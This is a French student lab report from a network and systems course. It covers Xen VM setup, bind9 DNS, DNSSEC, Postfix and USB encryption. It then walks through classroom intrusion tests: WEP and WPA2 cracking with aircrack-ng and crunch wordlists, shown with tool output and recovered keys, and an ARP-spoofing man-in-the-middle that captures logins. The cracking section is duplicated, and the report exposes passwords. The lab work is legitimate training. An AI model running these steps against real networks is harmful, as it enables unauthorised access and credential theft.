00:14:1B:60:8C:27 -32 64 0 0 4 54e. WPA2 CCMP PSK kracotte08
00:14:1B:60:8C:24 -34 58 0 0 4 54e. WPA2 CCMP PSK kracotte05
00:14:1B:60:8C:23 -31 63 0 0 4 54e. WPA2 CCMP PSK kracotte04

Le réseau que nous voulons craquer est <code>cracotte05 ssid : 04:DA:D2:9C:50:54 chanel : 9</code>

On utilise la commande <code>airodump-ng -w reseau_cracotte05 -c 9 --bssid 04:DA:D2:9C:50:54 wlan0mon</code>. cela nous crée un <code>reseau_cracotte05-01.cap</code> On n'as pluq qu'a faire un <code>aircrack-ng reseau_cracotte05-01.cap </code>.

KB depth byte(vote)
0 0/ 1 F1(50176) 48(46848) A1(46080) C9(45824) 2A(45056)
1 0/ 1 DE(50944) F0(46592) 60(45824) 4D(45312) 1E(44544)
2 1/ 3 D4(47360) 98(46336) B6(45568) A7(45056) EB(45056)
3 0/ 2 00(47360) 34(46848) 4E(45824) 6F(44800) 35(44544)
4 0/ 1 00(50688) 09(45824) 50(45568) FD(45056) 5E(44032)
5 0/ 3 00(46592) BD(45824) 4A(45824) 5A(45056) 87(45056)
6 0/ 1 00(51456) 09(47104) 3A(45824) F9(45824) 04(45568)
7 0/ 1 00(51712) C9(47360) 08(46336) 56(45312) E2(44800)
8 0/ 1 00(54016) 05(45568) C1(45312) D5(44544) B7(44288)
9 0/ 2 00(47872) 56(46592) 84(45568) 88(45568) F2(45056)
10 1/ 2 09(48128) 6B(45824) D5(45824) 0C(45568) C2(45568)
11 0/ 2 99(48128) 76(47616) 99(46080) E6(46080) 06(44800)
12 2/ 4 FD(44800) DE(44544) B9(44032) 3F(43776) 94(43776)

KEY FOUND! [ F1:DE:D4:00:00:00:00:00:00:00:09:99:99 ]
Decrypted correctly: 100%

Et voila nous avons trouver clef du réseau wifi cracotte05

=== Utilisation de AirCrack pour clef WPA2-PSA ===

On va maintenant craquer le réseau Kracotte05 qui est un réseau WPA on sait d'avance que la clef WPA est un nombre sur 8 chiffres.
On va donc faire un "cassage par force brute" avec un fichier texte contenant tout les combination de 00000000 a 99999999.

On commence par installer Crnch avec la commande <code>sudo apt-get install -y crunch</code>

Une fois installer on génère un fichier dictionnaite.txt avec la commande <code>crunch 8 8 0123456789 >> dictionnaire_wpa.txt</code>
On relance la commande <code>airodump-ng -w reseau_kracotte05 -c 5 --bssid 00:14:1B:60:8C:24</code>
On a bien sure remplacer le ssid et le chanel par celui du wifi Kracotte05.

Puis nous lançons aircrack-ng avec la commande <code>aircrack-ng reseau_kracotte05-01.cap -w dictionnaire_wpa.txt</code>
Read 121032 packets.

# BSSID ESSID Encryption

1 00:14:1B:60:8C:24 kracotte05 No data - WEP or WPA

Choosing first network as target.

Opening reseau_kracotte05-01.cap
Read 121032 packets.

1 potential targets
Got no data packets from target network!
Quitting aircrack-ng...

On peut voir que cela prend du temps pour récupérer les data nécessaire pour effectuer le crackage 1 data toutes les 15 minutes.
Une fois que on a récupérer les data, on peux effectuer le "cassage par force brute"

Aircrack-ng 1.5.2

[00:32:18] 10323450/102795810 keys tested (2771.75 k/s)

Time left: 9 hours, 16 minutes, 11 seconds 10.04%

KEY FOUND! [ 10244444 ]

Master Key : D6 B0 55 29 8C A0 B4 C9 13 24 C9 03 8C D5 13 4B
46 A4 C2 DB 79 E7 4C BC AE B5 5A 5D 48 D7 C4 3B

Transient Key : 25 23 28 1B 21 51 4B 87 07 51 A4 8E D1 80 48 C8
54 F6 87 8B 30 DF C1 D0 E6 1A 74 87 2F 50 EC 1B
9B 24 39 29 40 E3 BD 89 CD AE 3E 81 E9 EC 16 70
79 F9 24 2E 30 4E 52 24 A9 41 30 52 E1 25 EC 85

EAPOL HMAC : 7F AC 76 7D B5 33 0C 24 20 C3 BA A2 4B DF 2F CD

On a bien trouver la clé du wifi !
On voit que cela peut prendre beaucoup de temps pour trouver la clé, d'out l'interner de couper le dictionnaire en plusieurs et lancer le traitement sur plusieurs pc des camarades de classe. Cela permet de diviser le temps de traitement par le nombre de machine utilisé.

===Exploitation de failles du système===

===Attaque de type "homme au milieu" par usurpation ARP===
Maintenant on tesnt une attaque par "homme au milieu" pour commancé, on va installer le paquetage <code>dsniff</code> pour cela on utilise la commande : <code>apt-get install dsniff</code>

On regarde dans un premier temps si le pc peut se comporter comme un routeur avec la commande <code>cat /proc/sys/net/ipv4/ip_forward</code> normalement il nous notifie '0' se qui prouve que le pc ne se comporte pas comme un routeur. On utilise la commande <code>cat /proc/sys/net/ipv4/ip_forward</code> pour faire passer la variable a 1. maintenant le PC peut se comporter comme un routeur.

On fait la commande <code>cat /proc/sys/net/ipv4/conf/all/rp_filter</code> la variable recu doit être a '0' ce qui permet aux pc de renvoyer les requètes sur l'interface qui les a recu.

Ensuite on fait un <code>ip r</code> pour récupérer l'adresse ip du routeur.
[[Fichier:Ip_r_mirage.png|1000px|thumb|left|capture de la commande ip r]]
 

On fait la commande <code>arpspoof -i bridge -t zabeth07 172.26.145.254</code>
On lance Wireshark en root en utilisant la commande <code>su</code> si celui ci n'est pas installer on fait préalablement <code>apt-get install wireshark</code>
Une fois Wireshark lancé, on filtre tout les paquets en provenance de nottre cible la zabeth07.
Il faut fauire attention de bien désativer les proxi dans firefow sinon cela ne fonctionne pas.

[[Fichier:Wireshark_mirage.png|1000px|thumb|left|capture de Wiresharkf]]
 

On peut voir que on a bien recupérer les mdp lors de la connexion aux site 'applications.polytech-lille.net'.
Non d'utilisateur : Oui le pas de calais
Mdp : le mdp

=== Intrusion sur un serveur d’application Web===

==Réalisations==

===Sécurisation de données===

===Chiffrement de données===

Parfois il est necessaire de chiffrer les données importante,d'avoir des clef USB, ou des fichier sécuriser. Pour sécuriser la clef USB, on va utilisé 'cryptsetup'
pour commancer on installe les paquetages 'lvm2' et 'cryptsetup'.
apt-get install cryptsetup
apt-get install lvm2

Le [https://doc.ubuntu-fr.org/cryptsetup site] on peut trouver la liste des commandes necessaire pour crypter le clef USB.

Premièrement on va formaté la clef usb pour avoir un disque propre avec la commande <code>mkfs.vfat -n 'Alex.G' -I /dev/sdb1</code> on obtien le nom de la clef USB avec la commande <code>df -h</code>
On a maintenant une clef USB clean qui a comme nom Alex.G et un format FAT32.

On peut lancer le cryptage de la clef USB avec la commande <code>cryptsetup luksFormat -c aes-xts-plain -s 512 /dev/sdb</code> Pour savoir ou les la clef USB on utilise la commande <code>lsblk</code>
On choisi un mdp pour le clef USB, puis on envoie le fichier etc sur le clef pour vérifier si il est bien encrypter. Une fois la clef crypter avec un fichier dessu, on va sur un autre pc et on, vérifie si le fichier est bien crypter.
La liste des commande utilisé est listé ci-dessous :
mount /dev/mapper/Alex.G /mnt
cp -r /etc /mnt
umount /mnt
cryptsetup luksClose Alex.G

On peut voir que le clef USB crypter fonctionne bien.
[[Fichier:ClefUSBLock_2020-11-13_11-48-55.png|1000px|thumb|left|Cryptage de la clef USB]]
 

===Inspection ARP par un élément réseau===

===Sécurisation WiFi par WPA2-EAP===

TP sysres IMA2a5 2020/2021 G5

2020-11-20T08:50:45Z

Aglaine : /* Réception d'un message */

== Introduction ==

Cet atelier consiste en la réalisation d’une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6. D’un point de vue système vous aurez à installer une machine virtuelle Xen et à y configurer des services. Enfin la mise en place d’un réseau WiFi sécurisé et d’un site web sécurisé vous permettent de mettre en pratiques vos connaissances en la matière.

=== Tableau Récapitulatif ===
{| class="wikitable" style="text-align: center;width: 35%;margin: auto;"
! Description !! Détails
|-
! scope="row" style="width: 40%"|ID VLAN
|style="width: 60%"|Vlan7
|-
! scope="row" style="width: 40%"|Réseau IP V4
|style="width: 60%"|193.48.57.168
|-
! scope="row" style="width: 40%"|Réseau IP V6
|style="width: 60%"|
|-
! scope="row" style="width: 40%"|Nom de de la VM
|style="width: 60%"|mirage
|-
! scope="row" style="width: 40%"|Numéro de poste
|style="width: 60%"|Zabeth06
|-
! scope="row" style="width: 40%"|Adresse du site internet version HTTP
|style="width: 60%"|
|-
! scope="row" style="width: 40%"|Adresse du site internet version HTTPS
|style="width: 60%"|
|-
|}

== Installation des systèmes d’exploitation ==

Pour installer une Machine Virtuelle, il faut d'abord se connecter sur le disque de virtualisation.
Pour cela, il faut utiliser la commande :
ssh capbreton.plil.info

=== Installation dans la machine virtuelle Xen ===

Une fois connecter, il faut lancer la création de la Machine virtuelle avec la commande :
xen-create-image --hostname=mirage --ip 193.48.57.168 --netmask=255.255.255.0 --gateway=100.64.0.5 --dist=ascii --dir=/usr/local/xen --force

L'installation prend un certain temps pour regarder si l'installation se déroule bien, on peut ouvrir un second terminale connecté en SSH a "capbreton" puis on utilise la commande :
tail -f /var/log/xen-tools/mirage.0.log

A la fin de l'installation, on obtient le mot de passe root et des informations importantes :
Installation Summary
---------------------
Hostname : mirage
Distribution : ascii
MAC Address : xxxxxxxxxxx
IP Address(es) : dynamic
SSH Fingerprint : SHA256:xxxxxxx (DSA)
SSH Fingerprint : SHA256:xxxxxxx (ECDSA)
SSH Fingerprint : SHA256:xxxxxxx (ED25519)
SSH Fingerprint : SHA256:xxxxxxx (RSA)
Root Password : DgtUlOmnBFERdfarGBsopGR

Une fois la VM créer, nous pouvons la lancer avec la commande :
xl create /etc/xen/mirage.cfg

On peut vérifier que le VM est bien démarrer avec la commande :
xl list
Pour fonctionner l'état de la VM doit être r ou -b
[[Fichier:LancementVm.PNG|1000px|thumb|left|Liste des VM en fonctionnement]]

 

On accède pour la premier fois a nottre Vm avec la commande :
xl console mirage

il demande alors le login (root) et le mdp (longue chaine précédemment générée).
Après nous être logué, on change le mot de passe qui devient : glopglopglop.

=== Configuration de la machine virtuelle Xen ===

Il faut maintenant installer les packages que nous avons besoins :
apt-get update
apt-get install VIM

Il faut configurer l'adresse IP et le mask de la VM. Pour cela on utilise la commande :
vim /etc/network/interfaces

Dans interfaces on tajoute
auto eth0
iface eth0 inet static
address 193.48.57.168
gateway 193.58.57.163
netmask 255.255.255.248

Pour que la machine soit joignable par SSH via l'extérieure il est nécessaire de configurer la passerelle et le ssh_config. Pour cela on utilise la commande :
vi /etc/ssh/ssh_config

Le fichier ssh_config doit être configurer comme ci dessous :
Host *
SendEnv LANH LC_*
HashKnownHOST yes
GSSAPIAuthentification yes

Sur Capbreton, une paserell doit être mis en place pour pouvoir connecté les VM aux monde extérieure.
Pour cela on configure ces interfacte avec la commande :
vim/etc/network/interfaces

Puis on configure la passerelle comem ci dessous :
<pre>
# The loopback network interface
auto lo
iface lo inet loopback

# Physical Network Interfaces
#
auto eth
iface eth inet static
address 192.168.0.29
netmask 255.255.255.0
gateway 192.168.0.1

auto eth0
iface eth0 inet manual
post-up ip link set $IFACE up
post-down ip link set $IFACE down

auto eth1
iface eth1 inet manual
post-up ip link set $IFACE up
post-down ip link set $IFACE down

auto eth2
iface eth2 inet manual
post-up ip link set $IFACE up
post-down ip link set $IFACE down

auto eth4
iface eth4 inet manual
post-up ip link set $IFACE up
post-down ip link set $IFACE down

auto eth5
iface eth5 inet manual
post-up ip link set $IFACE up
post-down ip link set $IFACE down

auto eth6
iface eth6 inet manual
post-up ip link set $IFACE up
post-down ip link set $IFACE down

auto eth7
iface eth7 inet manual
post-up ip link set $IFACE up
post-down ip link set $IFACE down

# Main trunk bridge
#
auto Trunk
iface Trunk inet manual
bridge_ports eth4 eth5
post-up ip link set $IFACE up
post-down ip link set $IFACE down

# Virtual Network Interfaces
#

auto vlan48
iface vlan48 inet static
vlan-raw-device Trunk
address 172.26.191.21
netmask 255.255.252.0
gateway 172.26.191.254
iface vlan48 inet6 auto

auto vlan500
iface vlan500 inet manual
vlan-raw-device Trunk
post-up ip link set $IFACE up
post-down ip link set $IFACE down

auto vlan502
iface vlan502 inet manual
vlan-raw-device Trunk
post-up ip link set $IFACE up
post-down ip link set $IFACE down
# Bridge for IMA5sc group
#

auto IMA5sc
iface IMA5sc inet manual
bridge_ports eth0 eth6
# Bridge for IMA2a5
#

auto IMA2a5
iface IMA2a5 inet manual
bridge_ports eth1 eth7
# Bridge for L3MRIT group
#

auto L3MRIT
iface L3MRIT inet manual
bridge_ports eth2
# Bridge for GIS group
#

auto bridgeGIS
iface bridgeGIS inet manual
bridge_ports vlan502
</pre>

== Architecture réseau ==

===Sécurisation du réseau===

==Services Internet==

===Serveur SSH===

On peux maintenant se connecté a la VM mirage avec la commande : <code>ssh root@193.48.57.168 -p 2222</code>

===Serveur DNS===
Un serveur DNS (Domain Name System) permet d'effectuer correspondance entre un nom de domaine et une adresse IP. Grâce à DNS, il n'est pas nécessaire de se souvenir des adresses IP pour naviguer sur Ethernet. Pour installer notre propre serveur DNS nous avons utilisé Bind9.

Nous commençons tout d'abord par installer bind9 via la commande suivante : <code>apt-get install bind9</code>

==== Création et configuration named.conf.local ====
Le <code>named.conf.local</code> permet de faire pointer un nom de domaine pleinement qualifié (FQDN fully qualified domain name) sur une adresse IP.

Il faut tout d'abbord modifié le fichier <code>/etc/bind/named.conf.local</code> qui contient la configuration DNS et y déclaré les zones associées au domaine ainsi qu'un fichier de description de la zone.

[[Fichier:Mirage-config-named.conf.local.png|1000px|thumb|left|Configuration de mirage]]
 

Puis créé le fichier de configuration appelé <code>glopglop.site</code> avec la commande <code>vim /etc/bind/glopglop.site</code>

[[Fichier:Configuration_bind9.png|1000px|thumb|left|Configuration de bind9]]
 

On relance le service 'bind9' avec la commande :<code>service bind9 restart</code>

On vérifie que le DNS fonctionne bien avec le commande <code>host dns1.glopglop.site localhost</code>
[[Fichier:Dns1.glopglop.site_2020-11-13_08-57-52.png|1000px|thumb|left|Vérification du DNS en local]]
 
Le DNS fonctionne donc bien.

==== Configuration gandi.net ====
Grâce au registrar gandi.net, nous avons réservé le nom de domaine <code>glopglop.site</code>. L'extension <code>.site</code>

[[Fichier:Gandi-glopglop-VueGeneral.PNG|1000px|thumb|left|Image de la configuration de Gandi]]
 

On va maintenant ajouter un "glue record" qui est un enregistrement collé. Il permet d'associer un nom d'hôte avec une adresse IP au registre.
Glue records fournis par gandi pour associer un hostname (nom de serveur ou DNS) à l'adresse IP de notre machine. Les modifications seront effectives entre 12 et 24 heures.

[[Fichier:Mirage-Ajoue-GlueRecord.PNG|1000px|thumb|left|Image de la configuration de Gandi avec Glue Record]]
 

Une fois le "glue record" renseigner se qui va lié nottre dns a une ip, il faur renseigner les serveur de non. cela prend 27/72h.
Il faut bien faire attention que la VM soit correctement configurer avec 'bind9' car c'est lui qui donne IPv4 et IPv6 correspondant à vos noms de machines. Si ce n'est pas le cas gandi ne pourras pas liée les dns a l'ip de la machine.

[[Fichier:GandiDNS_2020-11-13_09-00-16.png|1000px|thumb|left|DNS sur GANDI]]
 

Une fois les serveuyrs de non configurer, on peux fermer GANDI.

===Sécurisation de site web par certificat===

===Sécurisation de serveur DNS par DNSSEC===
Premièrement, on ajoute <code>l'obtion dnssec-enable yes;</code> dans le fichier <code>named.conf.options</code>.
====Génération des clef asymétrique====
Il est important de bien sauvegarder la clef privée, sinon nottre système de clef ne fonctionnera pas.
pour commancer, on crée un repertoire pour stocker les clef.
cd /etc/bind
mkdir glopglop.site.dnssec
cd glopglop.site.dnssec/

Une fois dans le dossier <code>glopglop.site.dnssec</code>, on crée les clefs avec la commande<code>dnssec-keygen -r /dev/urandom -a RSASHA1 -b 2048 -f KSK -n ZONE glopglop.site</code>
On obtien :
Generating key pair...............+++++ ..........................................+++++
Kglopglop.site.+005+15337

On crée ensuite le clef asymétrique pour la signature des enregistrements, pour cela on utilise la commande <code>dnssec-keygen -r /dev/urandom -a RSASHA1 -b 1024 -n ZONE glopglop.site</code>
On obtien :
Generating key pair................+++++ ..................................................+++++
Kglopglop.site.+005+55608

On a bien maintenant la paire de clef privée/publique. Le problème est qu'il est difficile de les distinguer avec leurs nom compliquer, il faut donc les rennomer pouyr plus de transparance.
On renomme donc les deux paires de clefs obtenues en utilisant le nom de la zone comme préfixe puis en suffixant d’abord par la destination de la clef (-ksk pour la KSK ou -zsk pour la ZSK) puis par le type de clef (.key pour la clef publique ou .private pour la clef privée);

mv Kglopglop.site.+005+15337.key glopglop.site-ksk.key
mv Kglopglop.site.+005+15337.private glopglop.site-ksk.private
mv Kglopglop.site.+005+55608.key glopglop.site-zsk.key
mv Kglopglop.site.+005+55608.private glopglop.site-zsk.private

[[Fichier:ClefPrivéePublique_2020-11-13_09-23-42.png|1000px|thumb|left|Clef Privée et Public]]
 

Dans <code>db.glopglop.site</code> on ajoute les deux lignes ci-dessous :
$include /etc/bind/glopglop.site.dnssec/glopglop.site-ksk.key
$include /etc/bind/glopglop.site.dnssec/glopglop.site-zsk.key

On signe la zone d'enregistremment avec la commande <code>dnssec-signzone -o glopglop.site -k glopglop.site-ksk ../db.glopglop.site glopglop.site-zsk</code>
[[Fichier:Zones_d'enregistrement_2020-11-13_10-27-11.png|1000px|thumb|left|Generation des zones d'enregistrement]]
 

Les clef sont maintenant fonctionelle il faut donc les ajouter a GANDI, pour cela on se connecte a gandi puis on ajoute une clef KSK.
pour obtenir la cled on utilise la commande <code>cat glopglop.site-ksk.key</code> on obtien le résultat ci-dessous :
; This is a key-signing key, keyid 15337, for glopglop.site.
; Created: 20201113090442 (Fri Nov 13 09:04:42 2020)
; Publish: 20201113090442 (Fri Nov 13 09:04:42 2020)
; Activate: 20201113090442 (Fri Nov 13 09:04:42 2020)
glopglop.site. IN DNSKEY 257 3 5 AwEAAc3TCJkWFGnZSj/Q364AF7n69UaXum/no+LuEbXbGjTXLETdYk+Q gVAmIpvbJXcG0rucJTbVFaHr8IhWqf7VvkCbEGAORAkzBVXThPDR1pZR lJDEY88Lb2T6k9uHw43l2oP8vPev2eIRbU3VxUuJs++elgj32DTBA+yK p++/gz29H6PQVpkHnH81RjGdV+K1RZEwxkuev2MmB329fhMRwTsbW0BV aeXc5faRk9ZEKb7tr0p7txVv4wZEL6it01ZiNyGktwLRj8ln+cQz1GtC PY/UWnCtamycE/2k4f98sdDa6TMiguuBNOPug+ODzqGiI7LNUyF4jBbf 6NAgChwITps=

On ajoute la clef a gandi comme montrer ci-dessous en n'oubliant pas de selectionner '5(RSA/SHA-1'.
[[Fichier:Zones_d'enregistrement_2020-11-13_10-27-11.png|1000px|thumb|left|gandi enregistrement de la clef KSK]]
 

Pour vérifier que tout fonctionne correctement, on va sur le site 'dnsvizi.net' il nous permet d'analyser le dns et représanter la chaine d'autentification DNSSEC.
[[Fichier:DNSSEC_2020-11-13_11-59-06.png|1000px|thumb|left|Test du DNSSEC]]
 

On peut voir que maintenant on a bien le statu 'SECURE' donc tout fonctionne bien.

===Installation d'une méchagerie===
====Configuration de Postfix====
Pour recevoir le mail de vérfication de GANDI il faut sur la VM un gestionnaire de mail il faut installer mutt et postfix. On utilise les commandes ci-dessous :
apt-get install postfix
ant-get install mutt

A l'installation de 'postfix' un fenètre de configuration s'ouver.
Il faut renseigner le non du site comme 'System mail name : 'glopglop.site'

On vérifie la configuration de 'postix' en allant dans le 'main.cf'
vi /etc/postfix/main.cf

[[Fichier:Config Postfix mirage.png|1000px|thumb|left|Configuration de postfix]]
 

On a bien le non de domaine 'glopglop.site' on peut relancer 'postfix'
service postfix restart
Si le service n'est pas configurer correctement, on peut le reconfigurer avec la commande <code>dpkg-reconfigure postfix</code>
====Réception d'un message====
On peux testé la reception de message en envoyant un message a 'roor@glopglop.site'
Si tout fonctionne bien, on peux visualisé les méssage recu en tappant la commande <code>mutt</code>

[[Fichier:Reception_messages_mirage.png|1000px|thumb|left|texte descriptif]]
 

On constate que on resoit bien les message en provenance du mail de Polytech.
Pour que gandi puissent nous envoyer le mail contenant la clef de cryptage, on a besoint de pouvoir recevoirr les messages qui sont destiné a 'admin@glopglop.site'

Pour cela on va modifier le fichier 'vim /etc/aliases' en ajoutant la commande <code>admin:root</code>
On crée ensuite un <code>newaliases</code> puis on restarte bind9 avec la commance <code>service bind9 restart</code>

Attention pour les test il est conseiller d'utilisé deux boite mail différante care celle ci prenne du temps pour se mettre a jours.

====renvoie du mail Gandi====

Quand on est sure que le mail fonctionne bien avec l'envoie d'un message a destination de 'admin@glopglop.site' on peux demandé a gandi de bous envoyer la clef de cryptage.
On demande d'envoyet le ssl certification a notre VM, cela peux prendre un certain temps.

==Tests d’intrusion==

=== Description ===
Un ordinateur portable et une clef Wifi est fourni par Monsieur Redon. Pour que le clef fonctionne il est nécessite pas nécessairement de la configuration. Il faut aussi installer les paquetages nécessaire pour craquer la clef Wep et la clef WPA

=== Installation de la clef Wifi ===
Avec la commande <code>lsusb</code> on peux voir la list des interfaces connecté aux pc. Ci-dessous les résultats obtenu.

Bus 003 Device 004: ID 148f:5370 Ralink Technology, Corp. RT5370 Wireless Adapter
Bus 003 Device 002: ID 8087:0024 Intel Corp. Integrated Rate Matching Hub
Bus 003 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub
Bus 004 Device 001: ID 1d6b:0003 Linux Foundation 3.0 root hub
Bus 002 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub
Bus 001 Device 004: ID 413c:2003 Dell Computer Corp. Keyboard
Bus 001 Device 003: ID 046d:c016 Logitech, Inc. Optical Wheel Mouse
Bus 001 Device 002: ID 8087:0024 Intel Corp. Integrated Rate Matching Hub
Bus 001 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub

La clef ubs Wifi est bien détécter.
On doit donc installer le pilote pour les clef usb RT5370 avec la commande :
apt-get install firmware-ralink
apt-get install firmware-misc-nonfree

Une fois les pilotes installer, on récupéère le nom de l'interface wifi avec la commande <code>ip l</code> et on récupère le résultat ci-dessous :
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN mode DEFAULT group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast master bridge state UP mode DEFAULT group default qlen 1000
link/ether 00:22:4d:7a:f1:c3 brd ff:ff:ff:ff:ff:ff
3: eth1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast master bridge state UP mode DEFAULT group default qlen 1000
link/ether 00:15:17:3b:14:a8 brd ff:ff:ff:ff:ff:ff
5: bridge: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP mode DEFAULT group default qlen 1000
link/ether 00:15:17:3b:14:a8 brd ff:ff:ff:ff:ff:ff
6: vmnet1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UNKNOWN mode DEFAULT group default qlen 1000
link/ether 00:50:56:c0:00:01 brd ff:ff:ff:ff:ff:ff
7: vmnet8: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UNKNOWN mode DEFAULT group default qlen 1000
link/ether 00:50:56:c0:00:08 brd ff:ff:ff:ff:ff:ff
8: wlx40a5ef059784: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc mq state DOWN mode DEFAULT group default qlen 1000
link/ether 40:a5:ef:05:97:84 brd ff:ff:ff:ff:ff:ff

La clef wifi s'apelle donc <code>wlx40a5ef059784</code> on fait maintenant un <code> ip link set wlx40a5ef059784 up></code>

Avec la comande <code>dmsg</code> on vérifie que la clef wifi fonctionne bien.

=== Installation du paquetage AirCrack-ng ===
Pour installer [https://doc.ubuntu-fr.org/aircrack-ng AirCrack] (utilitaire qui permet de casser les clefs WEP et WPA), il faut de taper la commande :
apt-get install aircrack-ng
apt-get install firmware-misc-nonfree

=== Utilisation de AirCrack pour clef WEP ===

Après avoir branché la clef WiFi, on se sert de <code>airmon-ng</code> qui est un utilitaire qui espionne le réseau et permet d'obtenir les types d'interfaces communicantes/espionnable.
airmon-ng
Pour tenter de s'y connecter en tant qu'espion, il faut alors taper (nous le tapons ici avec wlan0mon):
airmon-ng start wlx40a5ef059784
Puis, pour observer et découvrir les canaux associés au réseau et leurs SSID,il faut taper:
airodump-ng wlan0mon

On obtien le résultat ci dessous :

BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

38:0E:4D:B0:E9:E0 -1 0 1 0 1 -1 WPA <length: 0>
04:DA:D2:9C:50:51 -30 49 834 0 9 54e. WEP WEP cracotte02
04:DA:D2:9C:50:5A -29 44 841 0 9 54e. WEP WEP cracotte11
04:DA:D2:9C:50:56 -28 53 832 9 9 54e. WEP WEP cracotte07
04:DA:D2:9C:50:57 -29 54 803 0 9 54e. WEP WEP cracotte08
04:DA:D2:9C:50:59 -30 50 833 0 9 54e. WEP WEP cracotte10
04:DA:D2:9C:50:54 -29 48 841 0 9 54e. WEP WEP cracotte05
04:DA:D2:9C:50:50 -29 50 841 0 9 54e. WEP WEP cracotte01
04:DA:D2:9C:50:5B -29 50 825 0 9 54e. WEP WEP cracotte12
04:DA:D2:9C:50:53 -33 46 843 0 9 54e. WEP WEP cracotte04
04:DA:D2:9C:50:58 -28 50 694 0 9 54e. WEP WEP cracotte09
04:DA:D2:9C:50:55 -30 49 746 0 9 54e. WEP WEP cracotte06
04:DA:D2:9C:50:52 -33 50 764 0 9 54e. WEP WEP cracotte03
00:14:1B:60:8C:28 -30 60 0 0 4 54e. WPA2 CCMP PSK kracotte09
00:14:1B:60:8C:22 -31 55 0 0 4 54e. WPA2 CCMP PSK kracotte03
00:14:1B:60:8C:27 -32 64 0 0 4 54e. WPA2 CCMP PSK kracotte08
00:14:1B:60:8C:24 -34 58 0 0 4 54e. WPA2 CCMP PSK kracotte05
00:14:1B:60:8C:23 -31 63 0 0 4 54e. WPA2 CCMP PSK kracotte04

Le réseau que nous voulons craquer est <code>cracotte05 ssid : 04:DA:D2:9C:50:54 chanel : 9</code>

On utilise la commande <code>airodump-ng -w reseau_cracotte05 -c 9 --bssid 04:DA:D2:9C:50:54 wlan0mon</code>. cela nous crée un <code>reseau_cracotte05-01.cap</code> On n'as pluq qu'a faire un <code>aircrack-ng reseau_cracotte05-01.cap </code>.

KB depth byte(vote)
0 0/ 1 F1(50176) 48(46848) A1(46080) C9(45824) 2A(45056)
1 0/ 1 DE(50944) F0(46592) 60(45824) 4D(45312) 1E(44544)
2 1/ 3 D4(47360) 98(46336) B6(45568) A7(45056) EB(45056)
3 0/ 2 00(47360) 34(46848) 4E(45824) 6F(44800) 35(44544)
4 0/ 1 00(50688) 09(45824) 50(45568) FD(45056) 5E(44032)
5 0/ 3 00(46592) BD(45824) 4A(45824) 5A(45056) 87(45056)
6 0/ 1 00(51456) 09(47104) 3A(45824) F9(45824) 04(45568)
7 0/ 1 00(51712) C9(47360) 08(46336) 56(45312) E2(44800)
8 0/ 1 00(54016) 05(45568) C1(45312) D5(44544) B7(44288)
9 0/ 2 00(47872) 56(46592) 84(45568) 88(45568) F2(45056)
10 1/ 2 09(48128) 6B(45824) D5(45824) 0C(45568) C2(45568)
11 0/ 2 99(48128) 76(47616) 99(46080) E6(46080) 06(44800)
12 2/ 4 FD(44800) DE(44544) B9(44032) 3F(43776) 94(43776)

KEY FOUND! [ F1:DE:D4:00:00:00:00:00:00:00:09:99:99 ]
Decrypted correctly: 100%

Et voila nous avons trouver clef du réseau wifi cracotte05

=== Utilisation de AirCrack pour clef WPA2-PSA ===

On va maintenant craquer le réseau Kracotte05 qui est un réseau WPA on sait d'avance que la clef WPA est un nombre sur 8 chiffres.
On va donc faire un "cassage par force brute" avec un fichier texte contenant tout les combination de 00000000 a 99999999.

On commence par installer Crnch avec la commande <code>sudo apt-get install -y crunch</code>

Une fois installer on génère un fichier dictionnaite.txt avec la commande <code>crunch 8 8 0123456789 >> dictionnaire_wpa.txt</code>
On relance la commande <code>airodump-ng -w reseau_kracotte05 -c 5 --bssid 00:14:1B:60:8C:24</code>
On a bien sure remplacer le ssid et le chanel par celui du wifi Kracotte05.

Puis nous lançons aircrack-ng avec la commande <code>aircrack-ng reseau_kracotte05-01.cap -w dictionnaire_wpa.txt</code>
Read 121032 packets.

# BSSID ESSID Encryption

1 00:14:1B:60:8C:24 kracotte05 No data - WEP or WPA

Choosing first network as target.

Opening reseau_kracotte05-01.cap
Read 121032 packets.

1 potential targets
Got no data packets from target network!
Quitting aircrack-ng...

On peut voir que cela prend du temps pour récupérer les data nécessaire pour effectuer le crackage 1 data toutes les 15 minutes.
Une fois que on a récupérer les data, on peux effectuer le "cassage par force brute"

Aircrack-ng 1.5.2

[00:32:18] 10323450/102795810 keys tested (2771.75 k/s)

Time left: 9 hours, 16 minutes, 11 seconds 10.04%

KEY FOUND! [ 10244444 ]

Master Key : D6 B0 55 29 8C A0 B4 C9 13 24 C9 03 8C D5 13 4B
46 A4 C2 DB 79 E7 4C BC AE B5 5A 5D 48 D7 C4 3B

Transient Key : 25 23 28 1B 21 51 4B 87 07 51 A4 8E D1 80 48 C8
54 F6 87 8B 30 DF C1 D0 E6 1A 74 87 2F 50 EC 1B
9B 24 39 29 40 E3 BD 89 CD AE 3E 81 E9 EC 16 70
79 F9 24 2E 30 4E 52 24 A9 41 30 52 E1 25 EC 85

EAPOL HMAC : 7F AC 76 7D B5 33 0C 24 20 C3 BA A2 4B DF 2F CD

On a bien trouver la clé du wifi !
On voit que cela peut prendre beaucoup de temps pour trouver la clé, d'out l'interner de couper le dictionnaire en plusieurs et lancer le traitement sur plusieurs pc des camarades de classe. Cela permet de diviser le temps de traitement par le nombre de machine utilisé.

===Exploitation de failles du système===

===Attaque de type "homme au milieu" par usurpation ARP===
Maintenant on tesnt une attaque par "homme au milieu" pour commancé, on va installer le paquetage <code>dsniff</code> pour cela on utilise la commande : <code>apt-get install dsniff</code>

